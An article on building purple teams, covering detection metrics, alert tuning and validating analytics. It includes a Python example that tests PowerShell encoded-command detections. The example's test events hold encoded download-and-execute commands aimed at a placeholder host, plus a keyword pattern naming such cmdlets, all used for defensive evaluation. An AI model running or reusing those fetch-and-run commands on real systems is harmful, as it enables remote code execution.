White hat hackers, often organized as red teams, have tested systems on behalf of organizations since the 1990s and have been a staple of cybersecurity ever since. As cyber threats have grown in scope and sophistication, so have the tactics of the adversaries, and red teams have evolved right along with them. Today, red teams proactively simulate nation-state-level threat actors to keep an organization's defenders on their toes and, in some cases, join forces with blue teams to attack and defend simultaneously in real time.
More organizations are realizing the benefits of coordinating and collaborating across red and blue teams, forming "purple" teams where attackers and defenders work together. These joint teams can simulate more aggressive attack environments, conduct more complex "what-if" scenarios, and collaborate side by side to understand outcomes. When effectively deployed and supported, purple teams can help organizations get ahead of attacks by finding and fixing potential vulnerabilities before the adversary can exploit them.
Purple teaming can settle many of the lingering questions organizations return to when allocating resources or judging effectiveness, because it integrates readily into existing team processes and workflows. That same ease of integration lets an organization run one focused security program that addresses its needs, instead of several programs that create information silos and need frequent updating.
Before adding new members to purple team activities, companies should first equip their existing teams with the right tactics and approaches. Here are some suggestions based on our experience supporting red, blue, and purple teams across industry sectors, from Fortune 500 companies to the federal government.
Track progress with the right metrics
As the classic adage advises, security teams can only manage what they can measure, and the right measurements are particularly important in cybersecurity and purple teaming. Security teams need to know whether their processes are quantifiably improving company defenses over time.
The most obvious measure: is the gap closing between the threats that are known and emulated and the organization's ability to detect them?
Security teams should also consider measuring the number of emulated threats for which detection signatures fire as true positives; the number of attacks and detections mapped to MITRE's ATT&CK framework; the number of new analytics with high confidence and low false-positive rates; and increased coverage of specific tactics, techniques, and procedures (TTPs).
Process also matters. Purple teams tend to work best in short iterations, with metrics that encourage collaboration rather than red and blue teams working at odds.
Sharpen the team’s alerts
The increased coverage and visibility from endpoint and network sensors, coupled with today's expanding attack surface, brings an increase in alerts. For cybersecurity analysts, this creates alert fatigue.
As a remedy, we recommend starting with the oft-cited "Pyramid of Pain," which ranks indicator types (hash values, IP addresses, domain names, network and host artifacts, tools, and TTPs) on two criteria: how much pain it costs the adversary to change an indicator of that type once defenders act on it, and how much effort it takes the team to collect indicators of that type and turn them into detections. By shifting focus toward the top of the pyramid, the team moves beyond static signatures to more robust and proactive behavioral detections, forcing adversaries to significantly change their tactics and spend more resources to succeed.
Purple teams also benefit from examining the data collection behind these alerts by asking:
- Is the company monitoring and collecting the right data?
- What data should the team keep and for how long?
- Does the team trust all the rules, watchlists, and alerts from vendors and third parties?
With answers to these questions, the team can make its existing tools more effective by customizing them to the company’s environment.
After identifying adversary tradecraft and creating behavioral analytics, look at strengthening them. Evaluate analytics for:
- Validation of true positives. Have the analytics been validated against an actual attack, ensuring that they will detect what's expected? Without a true-positive test case, purple teams are often lulled into a false sense of security as mistakes slip through the cracks. Examples include typos or syntax errors, a misinterpretation or false assumption made by the analytic author, or a misinformed or misrepresented attack in the threat intelligence source.
- Confidence. How often do the analytics produce false positives? Make sure the team has an acceptable number of results. As in other areas of security, consider a defense-in-depth approach with multiple analytics covering the same techniques at different confidence levels. Consider context, too: what counts as "normal" activity can't be gleaned from a single alert or event log, so the team may need to enrich its analytics with other sources of data.
- Robustness. How effectively do the analytics detect different variations of an attack? The variations are often very subtle, such as command-line parameters appearing in a different order, abbreviated parameter names, or extra spaces. Keep in mind that as an analytic becomes more robust, it may also pick up more false positives.
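The three evaluation criteria above can be exercised in code. The following Python script is an added example, not code from the article or from Booz Allen: it runs a brittle string-match analytic and a normalised, tiered analytic for PowerShell encoded commands (a well-known technique that appears in ATT&CK under command and scripting interpreter abuse) over a handful of constructed process-creation events, then scores each analytic against labelled attack and benign cases. The event lines, the function names (`parse_encoded_command`, `evaluate`, and friends) and the keyword list are invented for illustration; the assumptions about which parameter spellings powershell.exe accepts for -EncodedCommand and the simplified whitespace tokenisation are called out in comments.

```python
import base64
import re


def _enc(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed process-creation command lines (not real telemetry). The flag marks the
# true-positive test cases an analytic must catch; the benign rows are the false-positive bait.
SAMPLE_EVENTS = [
    ("powershell.exe -EncodedCommand " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"), True),
    # same technique, different case, reordered parameters, extra whitespace, abbreviated -enc
    ("PowerShell.exe  -NoP -W Hidden -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')"), True),
    # full image path and the shortest alias -e
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e " + _enc("Invoke-Expression $x"), True),
    ("powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1", False),
    ("powershell.exe -EncodedCommand " + _enc("Get-Date"), False),  # admin tooling: encoded but harmless
    ("notepad.exe C:\\notes\\EncodedCommand.txt", False),
]


def brittle_encoded_powershell(cmdline: str) -> bool:
    """Signature-style check: exact string, exact case, one space. Misses -enc, -e,
    reordered parameters and extra whitespace, and cannot tell benign encoded commands apart."""
    return "powershell.exe -EncodedCommand " in cmdline


def _is_encoded_param(token: str) -> bool:
    """Assumption: powershell.exe resolves the documented aliases -e and -ec plus any
    unambiguous prefix of -EncodedCommand (we accept prefixes of at least two characters)."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return t in ("e", "ec") or (len(t) >= 2 and "encodedcommand".startswith(t))


def parse_encoded_command(cmdline: str):
    """Return the decoded encoded-command payload, "" if the parameter is present but the
    payload will not decode, or None if this is not PowerShell with an encoded command.
    Case is folded, whitespace runs are collapsed by split(), and every token is inspected,
    so parameter order does not matter. Simplification: quoted paths containing spaces
    would need real Windows command-line parsing, which this example does not attempt."""
    tokens = cmdline.split()
    if not tokens:
        return None
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    for i, tok in enumerate(tokens[1:-1], start=1):
        if _is_encoded_param(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return ""  # flagged parameter with an undecodable payload is still worth a look
    return None


# Invented keyword list for the high-confidence tier; a real one would come from threat intel.
SUSPICIOUS_CMDLETS = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|frombase64string)\b"
)


def encoded_powershell_any(cmdline: str) -> bool:
    """Low-confidence tier: any PowerShell launch with an encoded command."""
    return parse_encoded_command(cmdline) is not None


def encoded_powershell_with_download(cmdline: str) -> bool:
    """High-confidence tier: encoded command whose decoded payload shows download/eval tradecraft."""
    payload = parse_encoded_command(cmdline)
    return payload is not None and bool(SUSPICIOUS_CMDLETS.search(payload))


def evaluate(analytic, events):
    """Score an analytic against labelled events. attack_cases is reported because a
    validation run with zero true-positive cases proves nothing about the analytic."""
    tp = fp = fn = 0
    for cmdline, is_attack in events:
        hit = analytic(cmdline)
        if hit and is_attack:
            tp += 1
        elif hit:
            fp += 1
        elif is_attack:
            fn += 1
    return {"tp": tp, "fp": fp, "fn": fn, "attack_cases": sum(1 for _, a in events if a)}


if __name__ == "__main__":
    for name, analytic in [("brittle", brittle_encoded_powershell),
                           ("any encoded", encoded_powershell_any),
                           ("encoded + download", encoded_powershell_with_download)]:
        print(f"{name:20s} {evaluate(analytic, SAMPLE_EVENTS)}")
```

Run stand-alone, the script shows the brittle analytic catching only one of the three attack cases while still firing on the benign encoded Get-Date, the normalised low-confidence tier catching all three at the cost of that one false positive, and the high-confidence tier catching all three with none. That is the defense-in-depth layering the confidence bullet describes, and `evaluate` is the true-positive validation step: had `SAMPLE_EVENTS` contained no attack rows, the zero false-positive score would have meant nothing.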
As the team considers our recommendations, remember that purple team programs are not a silver bullet. They must become part of a larger, integrated model of cybersecurity that includes the following:
- Common management and leadership. Define collective goals that drive risk reduction across the cyber defense team.
- Processes that encourage frequent communication. Break down siloes and encourage integrated approaches to historically separated operational teams.
- Metrics that track and encourage collaboration. Incentivize openness in reporting measurements and gamify the experience where possible.
- Functions that build upon previous activities to remove risk from the system. Take advantage of existing data sources and tools and optimize risk activities across the cybersecurity program portfolio.
These tactics can help the company maintain momentum in its purple teaming efforts and build resiliency into the security of the organization ahead of an attack, sharpening the organization's ability to detect, prevent, and respond to adversarial actions.
Timothy Nary, red team capability lead; Clayton Barlow-Wilcox, product manager, Booz Allen Dark Labs Team